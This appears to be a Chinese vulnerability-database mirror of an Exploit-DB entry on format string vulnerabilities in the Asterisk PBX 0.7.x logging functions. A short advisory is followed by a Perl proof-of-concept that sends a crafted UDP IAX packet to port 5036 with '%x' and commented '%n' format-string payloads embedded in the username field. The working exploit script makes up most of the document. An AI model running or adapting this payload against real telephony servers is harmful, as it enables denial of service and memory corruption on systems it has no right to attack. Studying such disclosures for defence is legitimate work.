Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054503 漏洞类型
发布时间 2004-06-18 更新时间 2004-06-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24221
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10569/info

It is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions.

An attacker may use these vulnerabilities to corrupt memory, and read or write arbitrary memory. Remote code execution is likely possible.

Due to the nature of these vulnerabilities, there may exist many different avenues of attack. Anything that can potentially call the logging functions with user-supplied data is vulnerable.

Versions 0.7.0 through to 0.7.2 are reported vulnerable.

#!/usr/bin/perl
#
# Asterisk 0.7.2 Linux PBX Remote Format string DoS (PoC)
#
# Feb 29 22:58:08 NOTICE[27151280]: Rejected connect attempt from 127.0.0.1, request
# 'exten=;callerid=;dnid=;context=;username=ce0ca0;language=;formats=;version=;}'

#
# kfinisterre[at]secnetops[dot]com - Copyright Secure Network Operations.
#

use IO::Socket::INET;

$sock=new IO::Socket::INET->new(PeerPort=>5036, Proto=>'udp', PeerAddr=>'localhost');
#$malpayload = "%.10d.";
#$malpayload .= "%.10d"; # add 6 to length
#$malpayload .="%n"; # write to the third address... we
have control of $esi
$malpayload = "AAAABBBB" . "%x." x 25;
$malpayload .="\x3b";

$payload = "\xa3\x7d\xff\xff\x00\x00\x00\x01\x00\x00\x06\x01\x65\x78\x74\x65\x6e\x3d\x3b" . # extern=;
"\x63\x61\x6c\x6c\x65\x72\x69\x64\x3d\x3b" . # callerid=;
"\x64\x6e\x69\x64\x3d\x3b" . # dnid=;
"\x63\x6f\x6e\x74\x65\x78\x74\x3d\x3b" . # context=;
"$malpayload" .
"\x75\x73\x65\x72\x6e\x61\x6d\x65\x3d" . # username=;
"\x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\x3b" . # language=;
"\x66\x6f\x72\x6d\x61\x74\x73\x3d\x3b" . # formats=;
"\x76\x65\x72\x73\x69\x6f\x6e\x3d\x3b" . # version=;
"\xa3\x7d\xff\xff\x00\x00\x00\x15\x00\x01\x06\x0b"; # end of payload

$sock->send($payload);
close($sock);